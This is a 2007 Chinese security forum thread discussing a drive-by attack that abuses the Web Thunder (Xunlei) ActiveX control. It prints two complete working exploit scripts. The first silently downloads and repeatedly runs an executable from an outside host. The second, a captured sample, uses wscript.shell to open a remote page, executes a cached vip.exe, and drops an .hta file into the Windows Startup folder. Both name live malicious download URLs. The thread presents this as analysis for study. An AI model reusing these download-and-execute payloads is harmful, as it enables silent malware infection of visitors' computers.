[讨论]今天网站被挂马 好像是利用迅雷漏洞的 大家来研究下
议题作者:sndqt信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
[code]//初始化控件,返回1表示安装了web讯雷,0为出现错误
function init()
{
try
{
thunder_server = new ActiveXObject("ThunderServer.webThunder.1");
}
catch(e)
{
//alert("init activex failed");
return 0;
}
return 1;
}[/code]
[code]////////////////////////////////////注意,核心函数////////////////////////////////////////
//////////成功执行后函数返回添加的下载任务的id,否则,返回1///////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////
function downfile()
{
thunder_server.SetConfig("MessagePanel","DownloadComplete","0");//下载完毕后无显示面版
thunder_server.SetConfig("Sound","DownloadComplete","0");//下载完毕无声音
thunder_server.ShowBrowserWindow();
//thunder_server.SetBrowserWindowSize(0, 0, 0, 0);
//不添加的话thunder_server.AddTask()就不会成功被执行,郁闷.........
var szURL= "http://www.021menghu.cn/test.exe";
//需要下载的程序的URL
var szFileName="test.exe";
//另存为的文件名
var szSavePath="d:\\";
// szSavePath=thunder_server.GetServerPath();
//另存为的路径
var szComments="";
//注释
var szRefURL="";
//引用URL
var nStartMode=1;
//0为手动开始,1为自动开始
var nOnlyFromOrigin=0;
//只从原始地址下载,0为否
var nOriginThreadNum=5;
//下载程序的线程数
var nIsNeedAccount=0;
//是否需要登陆,0为无需登陆
var szUserName="";
//登陆用户名
var szPassword="";
//登陆密码
var szTaskClass="";
//下载任务的类别,如“其他”,“软件”,“游戏”,“影视”等等
var szCID="";
//下载讯雷资源时才用到
var nIsAddUncompletedTask=0;
//看名字就知道
var szStatURL="";
//thunder_server.SetVariable("DoIntelligentName", "");
//调用AddTask()方法开始下载目标程序
var retStr = thunder_server.AddTask(szURL, szFileName, szSavePath,szComments, szRefURL,
nStartMode, nOnlyFromOrigin,nOriginThreadNum,
nIsNeedAccount, szUserName,szPassword,
szTaskClass, szCID, nIsAddUncompletedTask, szStatURL);
thunder_server.HideBrowserWindow(1);
//调用AddTask()方法后立即关掉打开的下载窗口
var ret_code = new Number();
var ret_msg = new String();
var aryStr = new String();
if (retStr.length > 0)
{
aryStr = retStr.split("{\r*\r}");
ret_code = parseInt(aryStr[0]);//记录添加任务结果,0为添加成功,1为出现错误,100为重复URL
ret_msg = aryStr[1];//正确执行后为添加的下载任务的id值
}
else //失败
{
return 1;
}
if(ret_code==1)return 1;
return ret_msg;
}
//运行下载后的文件
function open()
{
thunder_server.OpenFile(id_file);
}
function exec()
{
var ret=init();
if(ret==0)return;
id_file=downfile();
var i;
for(i=0;id_file==1&&i<50;i++)id_file=downfile();
if(id_file==1)return;
//若出现错误则一直调用downfile()函数直到成功为止!!
setInterval("open()",5000);
//搞了半天没有搞出下载完毕的回调函数,
//只能5秒为间隔的运行下载的程序。
//若文件没有下载完毕,调用open()函数时文件并未运行
}[/code]
代码在这了 大家都来研究下 没多大用处,讯雷有在线升级功能,而且是强制性的,你不升级没法用。。。。 [quote]引用第1楼寂寞宝贝于2007-06-12 15:53发表的 :
没多大用处,讯雷有在线升级功能,而且是强制性的,你不升级没法用。。。。[/quote]
同意楼上的,自动升级的确是一个麻烦的问题,这个木马貌似还很简陋啊,期待日后的发展 这不第六期黑防公布的讯雷0day嘛,这么快就出来网马了.真够XX的! 能不能通过限制迅雷,而强制用其他的下载工具来弥补这一点啊 [quote]//初始化控件,返回1表示安装了web讯雷,0为出现错误
[/quote]
安装了web讯雷? 那安装版的迅雷应该不起作用吧? 应该是对安装版的不起作用吧 我测试是没反应 如果可以对安装版的起作用 那危害就大很多了
高手谁知道 安装版的漏洞啊?? 貌似这东西老久了吧! 到底是安装版的还是web版的阿!??? 是针对WEB版的。
因为WEB版的很多东西都是在网页中调用的,所以要有ActiveX控件提供接口函数。
但是这些接口函数并不能识别调用者,所以你可以自己写一个网页来调用这些函数。
那个网马好像就是调用了WEB迅雷的接口函数来添加任务下载并打开一个文件,如果这个文件是一个恶意程序,打开就是直接运行了。
就是变相把WEB版迅雷当成了Downloader。
个人愚见,大家多指点。 他娘的,刚看完这个帖子不久就让我抓到一个迅雷的网马。
网马如下:
var qianxu_fan = null;
function shit()
{
try{qianxu_fan = new ActiveXObject("ThunderServer.webThunder.1");}
catch(e){return;}
var vip;
vip="<script defer> var shell=\"<html><body><script>window.moveTo(4000,4000);window.resizeTo(0,0);var shell=new ActiveXObject(\\\"wscript.shell\\\");shell.Run(\\\"C:\\\\\\\\Progra~1\\\\\\\\Intern~1\\\\\\\\IEXPLORE.EXE [url]http://123.8w8w8w.com.cn/123/vips.htm[/url]\\\",0,0);function runmm(){var path=shell.SpecialFolders(\\\"MyDocuments\\\");var china=path.substring(0,path.lastIndexOf(\\\"\\\\\\\\\\\"));china+=\\\"\\\\\\\\Local Settings\\\\\\\\Temporary Internet Files\\\\\\\\Content.IE5\\\\\\\\\\\";var sp=new ActiveXObject(\\\"shell.application\\\");var chenzi=sp.NameSpace(china);for(i=0;i<chenzi.Items().Count;i++){var Folder=chenzi.Items().Item(i).path;Folder+=\\\"\\\\\\\\vip[1].exe\\\";try{shell.Exec(Folder);}catch(e){};}window.close();};shell.Run(\\\"cmd.exe /c tree c:\\\\\\\\ /f\\\",0,1);runmm();<\\/script></body></html>\";var love = new ActiveXObject(\"ADODB.Recordset\");love.Fields.Append(\"love\", 200, 3000);love.Open();love.AddNew();love.Fields(\"love\").Value=shell;love.Update();love.Save(\"C:\\\\Documents and Settings\\\\All Users\\\\「开始」菜单\\\\程序\\\\启动\\\\microsofts.hta\",0);love.Close();</script>";
var ret=qianxu_fan["AddCateogry"](vip);
qianxu_fan["SetBrowserWindowSize"](0,0,400,300);
var chenzi = qianxu_fan["GetServerPath"]();
chenzi = chenzi["substr"](0, chenzi["length"]-1);
chenzi+="\\page\\index.htm";
qianxu_fan.SetBrowserWindowData(chenzi,"love");
qianxu_fan.HideBrowserWindow(1);
return;
}
下载的文件是:[url]http://123.8w8w8w.com.cn/123/vip.exe[/url]
大家鉴定下。 WEB版是强制升级的 [s:268]删除不必要的代码
页:
[1]